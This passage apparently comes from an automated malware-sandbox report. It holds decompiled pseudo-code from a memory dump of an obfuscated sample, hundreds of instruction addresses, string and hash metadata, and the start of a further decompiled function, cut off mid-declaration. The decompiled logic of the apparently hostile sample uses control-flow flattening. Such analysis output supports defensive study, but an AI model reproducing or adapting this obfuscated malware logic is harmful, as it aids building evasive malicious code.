                                                                                                                                                                                                                    										E00A7D6DF(_v384, _t1002, _v256, _v188);
                                                                                                                                                                                                                    										_t1000 = 0xcf09e4;
                                                                                                                                                                                                                    										L34:
                                                                                                                                                                                                                    										goto L35;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									if(_t873 == _t903) {
                                                                                                                                                                                                                    										_t870 = E00A7CF21(_v128, _v328, _v248, _v440, _v360);
                                                                                                                                                                                                                    										_t1005 = _t1005 + 0xc;
                                                                                                                                                                                                                    										__eflags = _t870 - _v168;
                                                                                                                                                                                                                    										_t843 = 0x1044b62;
                                                                                                                                                                                                                    										_t873 =  ==  ? 0x1044b62 : 0x59a9af2;
                                                                                                                                                                                                                    										goto L2;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									if(_t873 == _t977) {
                                                                                                                                                                                                                    										_t871 = E00A7E7BC(_v336,  &_v112, _v324, _v116, _v448, _v400, _v128, _v216);
                                                                                                                                                                                                                    										_t1005 = _t1005 + 0x18;
                                                                                                                                                                                                                    										__eflags = _t871;
                                                                                                                                                                                                                    										_t873 =  ==  ? _t1000 : 0xb701af7;
                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                    											L1:
                                                                                                                                                                                                                    											goto L2;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									if(_t873 != 0x4805cfc) {
                                                                                                                                                                                                                    										goto L36;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									E00A62984(_v220, _v228, _v348, _v176, _v184, _v124);
                                                                                                                                                                                                                    									L13:
                                                                                                                                                                                                                    									return _t1004;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								__eflags = _t873 - 0x59a9af2;
                                                                                                                                                                                                                    								if(_t873 == 0x59a9af2) {
                                                                                                                                                                                                                    									E00A7A668(_v356, _v236, _v364, _v128);
                                                                                                                                                                                                                    									_t873 = 0x4805cfc;
                                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								__eflags = _t873 - 0x8589966;
                                                                                                                                                                                                                    								if(_t873 == 0x8589966) {
                                                                                                                                                                                                                    									E00A7D806(_v192, _v112, _v372);
                                                                                                                                                                                                                    									_t873 = 0xb701af7;
                                                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                                                    										L1:
                                                                                                                                                                                                                    										goto L2;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								__eflags = _t873 - 0xa4ba762;
                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                    									_push(_v292);
                                                                                                                                                                                                                    									_push(_v284);
                                                                                                                                                                                                                    									_push(_v276);
                                                                                                                                                                                                                    									_t845 = E00A81E60(0xa6154c, _v444, __eflags);
                                                                                                                                                                                                                    									_push(_v268);
                                                                                                                                                                                                                    									_push(_v260);
                                                                                                                                                                                                                    									_push(_v436);
                                                                                                                                                                                                                    									__eflags = E00A7EBA2(_v404, E00A81E60(0xa6146c, _v252, __eflags), _v412, _v420, _t845,  &_v124, _v428) - _v212;
                                                                                                                                                                                                                    									_t873 =  ==  ? _v96 : 0x185f596;
                                                                                                                                                                                                                    									E00A7D6DF(_v388, _t845, _v208, _v396);
                                                                                                                                                                                                                    									E00A7D6DF(_v244, _t846, _v200, _v380);
                                                                                                                                                                                                                    									_t997 = _v104;
                                                                                                                                                                                                                    									_t1005 = _t1005 + 0x3c;
                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								__eflags = _t873 - 0xb701af7;
                                                                                                                                                                                                                    								if(_t873 == 0xb701af7) {
                                                                                                                                                                                                                    									E00A7A668(_v152, _v452, _v456, _v116);
                                                                                                                                                                                                                    									_t873 = 0x59a9af2;
                                                                                                                                                                                                                    									goto L1;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								__eflags = _t873 - 0xc69cff5;
                                                                                                                                                                                                                    								if(_t873 != 0xc69cff5) {
                                                                                                                                                                                                                    									goto L36;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								_v120 = _v100;
                                                                                                                                                                                                                    								_t855 = E00A77451(_v144, _v300, _v124, _v308,  &_v128, _v100, _v316);
                                                                                                                                                                                                                    								_t1005 = _t1005 + 0x14;
                                                                                                                                                                                                                    								__eflags = _t855 - _v376;
                                                                                                                                                                                                                    								_t903 = 0x1443a63;
                                                                                                                                                                                                                    								_t843 = 0x1044b62;
                                                                                                                                                                                                                    								_t873 =  ==  ? 0x1443a63 : 0x4805cfc;
                                                                                                                                                                                                                    								goto L3;
                                                                                                                                                                                                                    								L36:
                                                                                                                                                                                                                    								__eflags = _t873 - 0x185f596;
                                                                                                                                                                                                                    							} while (__eflags != 0);
                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}







































































































































                                                                                                                                                                                                                    0x00a633bf
                                                                                                                                                                                                                    0x00a633c1
                                                                                                                                                                                                                    0x00a633c8
                                                                                                                                                                                                                    0x00a633d5
                                                                                                                                                                                                                    0x00a633e0
                                                                                                                                                                                                                    0x00a633e2
                                                                                                                                                                                                                    0x00a633e7
                                                                                                                                                                                                                    0x00a633ee
                                                                                                                                                                                                                    0x00a633f5
                                                                                                                                                                                                                    0x00a633fd
                                                                                                                                                                                                                    0x00a63402
                                                                                                                                                                                                                    0x00a63407
                                                                                                                                                                                                                    0x00a6340f
                                                                                                                                                                                                                    0x00a63417
                                                                                                                                                                                                                    0x00a63422
                                                                                                                                                                                                                    0x00a6342d
                                                                                                                                                                                                                    0x00a63438
                                                                                                                                                                                                                    0x00a63443
                                                                                                                                                                                                                    0x00a6344e
                                                                                                                                                                                                                    0x00a63459
                                                                                                                                                                                                                    0x00a63461
                                                                                                                                                                                                                    0x00a6346f
                                                                                                                                                                                                                    0x00a63474
                                                                                                                                                                                                                    0x00a6347a
                                                                                                                                                                                                                    0x00a63482
                                                                                                                                                                                                                    0x00a6348a
                                                                                                                                                                                                                    0x00a63496
                                                                                                                                                                                                                    0x00a6349b
                                                                                                                                                                                                                    0x00a634a1
                                                                                                                                                                                                                    0x00a634a6
                                                                                                                                                                                                                    0x00a634ab
                                                                                                                                                                                                                    0x00a634b3
                                                                                                                                                                                                                    0x00a634be
                                                                                                                                                                                                                    0x00a634c9
                                                                                                                                                                                                                    0x00a634d4
                                                                                                                                                                                                                    0x00a634df
                                                                                                                                                                                                                    0x00a634ea
                                                                                                                                                                                                                    0x00a634f5
                                                                                                                                                                                                                    0x00a63500
                                                                                                                                                                                                                    0x00a6350b
                                                                                                                                                                                                                    0x00a63516
                                                                                                                                                                                                                    0x00a63521
                                                                                                                                                                                                                    0x00a6352c
                                                                                                                                                                                                                    0x00a63537
                                                                                                                                                                                                                    0x00a63542
                                                                                                                                                                                                                    0x00a6354d
                                                                                                                                                                                                                    0x00a63558
                                                                                                                                                                                                                    0x00a63563
                                                                                                                                                                                                                    0x00a6356e
                                                                                                                                                                                                                    0x00a63579
                                                                                                                                                                                                                    0x00a63584
                                                                                                                                                                                                                    0x00a6358f
                                                                                                                                                                                                                    0x00a6359a
                                                                                                                                                                                                                    0x00a635a5
                                                                                                                                                                                                                    0x00a635b0
                                                                                                                                                                                                                    0x00a635bb
                                                                                                                                                                                                                    0x00a635c6
                                                                                                                                                                                                                    0x00a635d2
                                                                                                                                                                                                                    0x00a635d7
                                                                                                                                                                                                                    0x00a635e1
                                                                                                                                                                                                                    0x00a635e4
                                                                                                                                                                                                                    0x00a635e8
                                                                                                                                                                                                                    0x00a635f2
                                                                                                                                                                                                                    0x00a635fa
                                                                                                                                                                                                                    0x00a63605
                                                                                                                                                                                                                    0x00a63619
                                                                                                                                                                                                                    0x00a6361e
                                                                                                                                                                                                                    0x00a63625
                                                                                                                                                                                                                    0x00a63630
                                                                                                                                                                                                                    0x00a6363b
                                                                                                                                                                                                                    0x00a63646
                                                                                                                                                                                                                    0x00a63651
                                                                                                                                                                                                                    0x00a6365c
                                                                                                                                                                                                                    0x00a63667
                                                                                                                                                                                                                    0x00a6366f
                                                                                                                                                                                                                    0x00a6367a
                                                                                                                                                                                                                    0x00a63685
                                                                                                                                                                                                                    0x00a63690
                                                                                                                                                                                                                    0x00a63698
                                                                                                                                                                                                                    0x00a636a3
                                                                                                                                                                                                                    0x00a636ae
                                                                                                                                                                                                                    0x00a636b6
                                                                                                                                                                                                                    0x00a636bb
                                                                                                                                                                                                                    0x00a636c3
                                                                                                                                                                                                                    0x00a636cb
                                                                                                                                                                                                                    0x00a636d3
                                                                                                                                                                                                                    0x00a636e6
                                                                                                                                                                                                                    0x00a636ed
                                                                                                                                                                                                                    0x00a636f8
                                                                                                                                                                                                                    0x00a63703
                                                                                                                                                                                                                    0x00a6370e
                                                                                                                                                                                                                    0x00a6371e
                                                                                                                                                                                                                    0x00a63725
                                                                                                                                                                                                                    0x00a63730
                                                                                                                                                                                                                    0x00a63738
                                                                                                                                                                                                                    0x00a63740
                                                                                                                                                                                                                    0x00a63748
                                                                                                                                                                                                                    0x00a63750
                                                                                                                                                                                                                    0x00a63758
                                                                                                                                                                                                                    0x00a63765
                                                                                                                                                                                                                    0x00a6376e
                                                                                                                                                                                                                    0x00a63772
                                                                                                                                                                                                                    0x00a6377a
                                                                                                                                                                                                                    0x00a63782
                                                                                                                                                                                                                    0x00a6378a
                                                                                                                                                                                                                    0x00a6379a
                                                                                                                                                                                                                    0x00a6379e
                                                                                                                                                                                                                    0x00a637a6
                                                                                                                                                                                                                    0x00a637ae
                                                                                                                                                                                                                    0x00a637b6
                                                                                                                                                                                                                    0x00a637be
                                                                                                                                                                                                                    0x00a637c6
                                                                                                                                                                                                                    0x00a637ce
                                                                                                                                                                                                                    0x00a637d9
                                                                                                                                                                                                                    0x00a637e1
                                                                                                                                                                                                                    0x00a637ec
                                                                                                                                                                                                                    0x00a637fa
                                                                                                                                                                                                                    0x00a637fe
                                                                                                                                                                                                                    0x00a63803
                                                                                                                                                                                                                    0x00a6380b
                                                                                                                                                                                                                    0x00a63813
                                                                                                                                                                                                                    0x00a6381e
                                                                                                                                                                                                                    0x00a6382e
                                                                                                                                                                                                                    0x00a63835
                                                                                                                                                                                                                    0x00a63842
                                                                                                                                                                                                                    0x00a63856
                                                                                                                                                                                                                    0x00a6385b
                                                                                                                                                                                                                    0x00a63864
                                                                                                                                                                                                                    0x00a6386f
                                                                                                                                                                                                                    0x00a63877
                                                                                                                                                                                                                    0x00a6387c
                                                                                                                                                                                                                    0x00a63884
                                                                                                                                                                                                                    0x00a6388c
                                                                                                                                                                                                                    0x00a63897
                                                                                                                                                                                                                    0x00a638a2
                                                                                                                                                                                                                    0x00a638ad
                                                                                                                                                                                                                    0x00a638b8
                                                                                                                                                                                                                    0x00a638c3
                                                                                                                                                                                                                    0x00a638ce
                                                                                                                                                                                                                    0x00a638d9
                                                                                                                                                                                                                    0x00a638e4
                                                                                                                                                                                                                    0x00a638ef
                                                                                                                                                                                                                    0x00a638f7
                                                                                                                                                                                                                    0x00a63902
                                                                                                                                                                                                                    0x00a6390d
                                                                                                                                                                                                                    0x00a6391f
                                                                                                                                                                                                                    0x00a63924
                                                                                                                                                                                                                    0x00a6392d
                                                                                                                                                                                                                    0x00a63938
                                                                                                                                                                                                                    0x00a63943
                                                                                                                                                                                                                    0x00a6394e
                                                                                                                                                                                                                    0x00a63959
                                                                                                                                                                                                                    0x00a63964
                                                                                                                                                                                                                    0x00a6396f
                                                                                                                                                                                                                    0x00a63977
                                                                                                                                                                                                                    0x00a6397b
                                                                                                                                                                                                                    0x00a63980
                                                                                                                                                                                                                    0x00a63986
                                                                                                                                                                                                                    0x00a6398e
                                                                                                                                                                                                                    0x00a63996
                                                                                                                                                                                                                    0x00a6399e
                                                                                                                                                                                                                    0x00a639a6
                                                                                                                                                                                                                    0x00a639ae
                                                                                                                                                                                                                    0x00a639b6
                                                                                                                                                                                                                    0x00a639be
                                                                                                                                                                                                                    0x00a639c6
                                                                                                                                                                                                                    0x00a639ce
                                                                                                                                                                                                                    0x00a639d7
                                                                                                                                                                                                                    0x00a639dc
                                                                                                                                                                                                                    0x00a639e2
                                                                                                                                                                                                                    0x00a639ea
                                                                                                                                                                                                                    0x00a639f2
                                                                                                                                                                                                                    0x00a639fa
                                                                                                                                                                                                                    0x00a63a02
                                                                                                                                                                                                                    0x00a63a0a
                                                                                                                                                                                                                    0x00a63a12
                                                                                                                                                                                                                    0x00a63a1a
                                                                                                                                                                                                                    0x00a63a26
                                                                                                                                                                                                                    0x00a63a2b
                                                                                                                                                                                                                    0x00a63a2f
                                                                                                                                                                                                                    0x00a63a37
                                                                                                                                                                                                                    0x00a63a3f
                                                                                                                                                                                                                    0x00a63a4a
                                                                                                                                                                                                                    0x00a63a55
                                                                                                                                                                                                                    0x00a63a60
                                                                                                                                                                                                                    0x00a63a6b
                                                                                                                                                                                                                    0x00a63a7b
                                                                                                                                                                                                                    0x00a63a80
                                                                                                                                                                                                                    0x00a63a89
                                                                                                                                                                                                                    0x00a63a94
                                                                                                                                                                                                                    0x00a63a9f
                                                                                                                                                                                                                    0x00a63aaa
                                                                                                                                                                                                                    0x00a63ab5
                                                                                                                                                                                                                    0x00a63ac0
                                                                                                                                                                                                                    0x00a63acf
                                                                                                                                                                                                                    0x00a63ad4
                                                                                                                                                                                                                    0x00a63add
                                                                                                                                                                                                                    0x00a63ae8
                                                                                                                                                                                                                    0x00a63af3
                                                                                                                                                                                                                    0x00a63afe
                                                                                                                                                                                                                    0x00a63b09
                                                                                                                                                                                                                    0x00a63b14
                                                                                                                                                                                                                    0x00a63b1c
                                                                                                                                                                                                                    0x00a63b27
                                                                                                                                                                                                                    0x00a63b3a
                                                                                                                                                                                                                    0x00a63b3d
                                                                                                                                                                                                                    0x00a63b44
                                                                                                                                                                                                                    0x00a63b4f
                                                                                                                                                                                                                    0x00a63b5a
                                                                                                                                                                                                                    0x00a63b6d
                                                                                                                                                                                                                    0x00a63b7f
                                                                                                                                                                                                                    0x00a63b86
                                                                                                                                                                                                                    0x00a63b91
                                                                                                                                                                                                                    0x00a63b9c
                                                                                                                                                                                                                    0x00a63ba7
                                                                                                                                                                                                                    0x00a63bb2
                                                                                                                                                                                                                    0x00a63bbd
                                                                                                                                                                                                                    0x00a63bc8
                                                                                                                                                                                                                    0x00a63bd7
                                                                                                                                                                                                                    0x00a63bda
                                                                                                                                                                                                                    0x00a63be1
                                                                                                                                                                                                                    0x00a63bec
                                                                                                                                                                                                                    0x00a63bf4
                                                                                                                                                                                                                    0x00a63bfc
                                                                                                                                                                                                                    0x00a63c06
                                                                                                                                                                                                                    0x00a63c0a
                                                                                                                                                                                                                    0x00a63c12
                                                                                                                                                                                                                    0x00a63c1d
                                                                                                                                                                                                                    0x00a63c28
                                                                                                                                                                                                                    0x00a63c33
                                                                                                                                                                                                                    0x00a63c3e
                                                                                                                                                                                                                    0x00a63c49
                                                                                                                                                                                                                    0x00a63c54
                                                                                                                                                                                                                    0x00a63c5f
                                                                                                                                                                                                                    0x00a63c67
                                                                                                                                                                                                                    0x00a63c6c
                                                                                                                                                                                                                    0x00a63c74
                                                                                                                                                                                                                    0x00a63c7c
                                                                                                                                                                                                                    0x00a63c84
                                                                                                                                                                                                                    0x00a63c8f
                                                                                                                                                                                                                    0x00a63ca2
                                                                                                                                                                                                                    0x00a63ca9
                                                                                                                                                                                                                    0x00a63cb4
                                                                                                                                                                                                                    0x00a63cbf
                                                                                                                                                                                                                    0x00a63cca
                                                                                                                                                                                                                    0x00a63cd5
                                                                                                                                                                                                                    0x00a63ce0
                                                                                                                                                                                                                    0x00a63ce8
                                                                                                                                                                                                                    0x00a63cf3
                                                                                                                                                                                                                    0x00a63cfe
                                                                                                                                                                                                                    0x00a63d06
                                                                                                                                                                                                                    0x00a63d13
                                                                                                                                                                                                                    0x00a63d1e
                                                                                                                                                                                                                    0x00a63d29
                                                                                                                                                                                                                    0x00a63d34
                                                                                                                                                                                                                    0x00a63d49
                                                                                                                                                                                                                    0x00a63d4c
                                                                                                                                                                                                                    0x00a63d5b
                                                                                                                                                                                                                    0x00a63d62
                                                                                                                                                                                                                    0x00a63d6d
                                                                                                                                                                                                                    0x00a63d78
                                                                                                                                                                                                                    0x00a63d8b
                                                                                                                                                                                                                    0x00a63d92
                                                                                                                                                                                                                    0x00a63d9d
                                                                                                                                                                                                                    0x00a63da8
                                                                                                                                                                                                                    0x00a63db3
                                                                                                                                                                                                                    0x00a63dbb
                                                                                                                                                                                                                    0x00a63dc6
                                                                                                                                                                                                                    0x00a63dd1
                                                                                                                                                                                                                    0x00a63dd9
                                                                                                                                                                                                                    0x00a63de4
                                                                                                                                                                                                                    0x00a63def
                                                                                                                                                                                                                    0x00a63dfa
                                                                                                                                                                                                                    0x00a63e05
                                                                                                                                                                                                                    0x00a63e10
                                                                                                                                                                                                                    0x00a63e18
                                                                                                                                                                                                                    0x00a63e20
                                                                                                                                                                                                                    0x00a63e25
                                                                                                                                                                                                                    0x00a63e2d
                                                                                                                                                                                                                    0x00a63e35
                                                                                                                                                                                                                    0x00a63e40
                                                                                                                                                                                                                    0x00a63e56
                                                                                                                                                                                                                    0x00a63e5d
                                                                                                                                                                                                                    0x00a63e68
                                                                                                                                                                                                                    0x00a63e73
                                                                                                                                                                                                                    0x00a63e7e
                                                                                                                                                                                                                    0x00a63e89
                                                                                                                                                                                                                    0x00a63e9b
                                                                                                                                                                                                                    0x00a63ea0
                                                                                                                                                                                                                    0x00a63ea9
                                                                                                                                                                                                                    0x00a63eb4
                                                                                                                                                                                                                    0x00a63ebf
                                                                                                                                                                                                                    0x00a63eca
                                                                                                                                                                                                                    0x00a63ed5
                                                                                                                                                                                                                    0x00a63edd
                                                                                                                                                                                                                    0x00a63ee8
                                                                                                                                                                                                                    0x00a63ef4
                                                                                                                                                                                                                    0x00a63ef9
                                                                                                                                                                                                                    0x00a63f03
                                                                                                                                                                                                                    0x00a63f06
                                                                                                                                                                                                                    0x00a63f0a
                                                                                                                                                                                                                    0x00a63f0f
                                                                                                                                                                                                                    0x00a63f17
                                                                                                                                                                                                                    0x00a63f24
                                                                                                                                                                                                                    0x00a63f28
                                                                                                                                                                                                                    0x00a63f30
                                                                                                                                                                                                                    0x00a63f38
                                                                                                                                                                                                                    0x00a63f4b
                                                                                                                                                                                                                    0x00a63f52
                                                                                                                                                                                                                    0x00a63f5d
                                                                                                                                                                                                                    0x00a63f65
                                                                                                                                                                                                                    0x00a63f6f
                                                                                                                                                                                                                    0x00a63f77
                                                                                                                                                                                                                    0x00a63f7c
                                                                                                                                                                                                                    0x00a63f84
                                                                                                                                                                                                                    0x00a63f8c
                                                                                                                                                                                                                    0x00a63f97
                                                                                                                                                                                                                    0x00a63fa2
                                                                                                                                                                                                                    0x00a63fad
                                                                                                                                                                                                                    0x00a63fb5
                                                                                                                                                                                                                    0x00a63fbd
                                                                                                                                                                                                                    0x00a63fc5
                                                                                                                                                                                                                    0x00a63fcd
                                                                                                                                                                                                                    0x00a63fd5
                                                                                                                                                                                                                    0x00a63fdd
                                                                                                                                                                                                                    0x00a63feb
                                                                                                                                                                                                                    0x00a63ff0
                                                                                                                                                                                                                    0x00a63ff6
                                                                                                                                                                                                                    0x00a63ffe
                                                                                                                                                                                                                    0x00a64006
                                                                                                                                                                                                                    0x00a6400e
                                                                                                                                                                                                                    0x00a64018
                                                                                                                                                                                                                    0x00a64019
                                                                                                                                                                                                                    0x00a64024
                                                                                                                                                                                                                    0x00a6402f
                                                                                                                                                                                                                    0x00a6403a
                                                                                                                                                                                                                    0x00a6403e
                                                                                                                                                                                                                    0x00a64043
                                                                                                                                                                                                                    0x00a6404b
                                                                                                                                                                                                                    0x00a6405f
                                                                                                                                                                                                                    0x00a64066
                                                                                                                                                                                                                    0x00a64071
                                                                                                                                                                                                                    0x00a6407c
                                                                                                                                                                                                                    0x00a64084
                                                                                                                                                                                                                    0x00a64091
                                                                                                                                                                                                                    0x00a64095
                                                                                                                                                                                                                    0x00a6409d
                                                                                                                                                                                                                    0x00a640a5
                                                                                                                                                                                                                    0x00a640b0
                                                                                                                                                                                                                    0x00a640bb
                                                                                                                                                                                                                    0x00a640c3
                                                                                                                                                                                                                    0x00a640ce
                                                                                                                                                                                                                    0x00a640e1
                                                                                                                                                                                                                    0x00a640e8
                                                                                                                                                                                                                    0x00a640ef
                                                                                                                                                                                                                    0x00a640f7
                                                                                                                                                                                                                    0x00a64102
                                                                                                                                                                                                                    0x00a6410d
                                                                                                                                                                                                                    0x00a64115
                                                                                                                                                                                                                    0x00a64120
                                                                                                                                                                                                                    0x00a6412b
                                                                                                                                                                                                                    0x00a64136
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00a64146
                                                                                                                                                                                                                    0x00a64146
                                                                                                                                                                                                                    0x00a6414b
                                                                                                                                                                                                                    0x00a6414b
                                                                                                                                                                                                                    0x00a6414b
                                                                                                                                                                                                                    0x00a64150
                                                                                                                                                                                                                    0x00a64150
                                                                                                                                                                                                                    0x00a64150
                                                                                                                                                                                                                    0x00a64150
                                                                                                                                                                                                                    0x00a64156
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6415c
                                                                                                                                                                                                                    0x00a64375
                                                                                                                                                                                                                    0x00a64381
                                                                                                                                                                                                                    0x00a64388
                                                                                                                                                                                                                    0x00a64403
                                                                                                                                                                                                                    0x00a64417
                                                                                                                                                                                                                    0x00a6441a
                                                                                                                                                                                                                    0x00a6441f
                                                                                                                                                                                                                    0x00a64422
                                                                                                                                                                                                                    0x00a64422
                                                                                                                                                                                                                    0x00a645f8
                                                                                                                                                                                                                    0x00a645f8
                                                                                                                                                                                                                    0x00a645fd
                                                                                                                                                                                                                    0x00a64602
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64602
                                                                                                                                                                                                                    0x00a64168
                                                                                                                                                                                                                    0x00a6436b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6436b
                                                                                                                                                                                                                    0x00a64170
                                                                                                                                                                                                                    0x00a64354
                                                                                                                                                                                                                    0x00a6435b
                                                                                                                                                                                                                    0x00a64361
                                                                                                                                                                                                                    0x00a64363
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00a64146
                                                                                                                                                                                                                    0x00a6414b
                                                                                                                                                                                                                    0x00a6414b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6414b
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00a64178
                                                                                                                                                                                                                    0x00a6425e
                                                                                                                                                                                                                    0x00a64267
                                                                                                                                                                                                                    0x00a6426b
                                                                                                                                                                                                                    0x00a64282
                                                                                                                                                                                                                    0x00a64284
                                                                                                                                                                                                                    0x00a642d7
                                                                                                                                                                                                                    0x00a642dc
                                                                                                                                                                                                                    0x00a642df
                                                                                                                                                                                                                    0x00a642e6
                                                                                                                                                                                                                    0x00a64325
                                                                                                                                                                                                                    0x00a642e8
                                                                                                                                                                                                                    0x00a64316
                                                                                                                                                                                                                    0x00a6431b
                                                                                                                                                                                                                    0x00a6431e
                                                                                                                                                                                                                    0x00a6431e
                                                                                                                                                                                                                    0x00a6433e
                                                                                                                                                                                                                    0x00a64343
                                                                                                                                                                                                                    0x00a645f6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a645f7
                                                                                                                                                                                                                    0x00a64180
                                                                                                                                                                                                                    0x00a6423b
                                                                                                                                                                                                                    0x00a64247
                                                                                                                                                                                                                    0x00a6424a
                                                                                                                                                                                                                    0x00a64251
                                                                                                                                                                                                                    0x00a64256
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64256
                                                                                                                                                                                                                    0x00a64188
                                                                                                                                                                                                                    0x00a64207
                                                                                                                                                                                                                    0x00a6420c
                                                                                                                                                                                                                    0x00a64214
                                                                                                                                                                                                                    0x00a64216
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00a64190
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a641c0
                                                                                                                                                                                                                    0x00a641ca
                                                                                                                                                                                                                    0x00a641d4
                                                                                                                                                                                                                    0x00a641d4
                                                                                                                                                                                                                    0x00a6442c
                                                                                                                                                                                                                    0x00a64432
                                                                                                                                                                                                                    0x00a645ec
                                                                                                                                                                                                                    0x00a645f1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a645f1
                                                                                                                                                                                                                    0x00a64438
                                                                                                                                                                                                                    0x00a6443e
                                                                                                                                                                                                                    0x00a645c3
                                                                                                                                                                                                                    0x00a645c9
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00a64141
                                                                                                                                                                                                                    0x00a64444
                                                                                                                                                                                                                    0x00a6444a
                                                                                                                                                                                                                    0x00a644ea
                                                                                                                                                                                                                    0x00a644f6
                                                                                                                                                                                                                    0x00a644fd
                                                                                                                                                                                                                    0x00a64508
                                                                                                                                                                                                                    0x00a64517
                                                                                                                                                                                                                    0x00a6451e
                                                                                                                                                                                                                    0x00a64525
                                                                                                                                                                                                                    0x00a64564
                                                                                                                                                                                                                    0x00a6456d
                                                                                                                                                                                                                    0x00a64584
                                                                                                                                                                                                                    0x00a6459d
                                                                                                                                                                                                                    0x00a645a2
                                                                                                                                                                                                                    0x00a645a9
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a645a9
                                                                                                                                                                                                                    0x00a64450
                                                                                                                                                                                                                    0x00a64456
                                                                                                                                                                                                                    0x00a644d9
                                                                                                                                                                                                                    0x00a644e0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a644e0
                                                                                                                                                                                                                    0x00a64458
                                                                                                                                                                                                                    0x00a6445e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64473
                                                                                                                                                                                                                    0x00a6449e
                                                                                                                                                                                                                    0x00a644a7
                                                                                                                                                                                                                    0x00a644aa
                                                                                                                                                                                                                    0x00a644b1
                                                                                                                                                                                                                    0x00a644b6
                                                                                                                                                                                                                    0x00a644bb
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64607
                                                                                                                                                                                                                    0x00a64607
                                                                                                                                                                                                                    0x00a64607
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64613
                                                                                                                                                                                                                    0x00a6414b
                                                                                                                                                                                                                    0x00a64146

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ":?$)u?A$7($=T26$C<$H$MV2$Pr$az^$hqI$os$uw$zt+${>r${{
                                                                                                                                                                                                                    • API String ID: 0-117365374
                                                                                                                                                                                                                    • Opcode ID: 63204de79638120109007a696414ebed1e9d1714057b85aecefe8205050516c3
                                                                                                                                                                                                                    • Instruction ID: 09fc4d85484e0bfa074a3f0b12aa158b10f96dfe44753389d20ef0f81cbf19fe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63204de79638120109007a696414ebed1e9d1714057b85aecefe8205050516c3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4592E171508380DBD3B8CF65C58AB9BBBE2BBD5344F10891DE2D986260DBB18959CF43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                    			E00A80E72(intOrPtr __ecx, void* __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
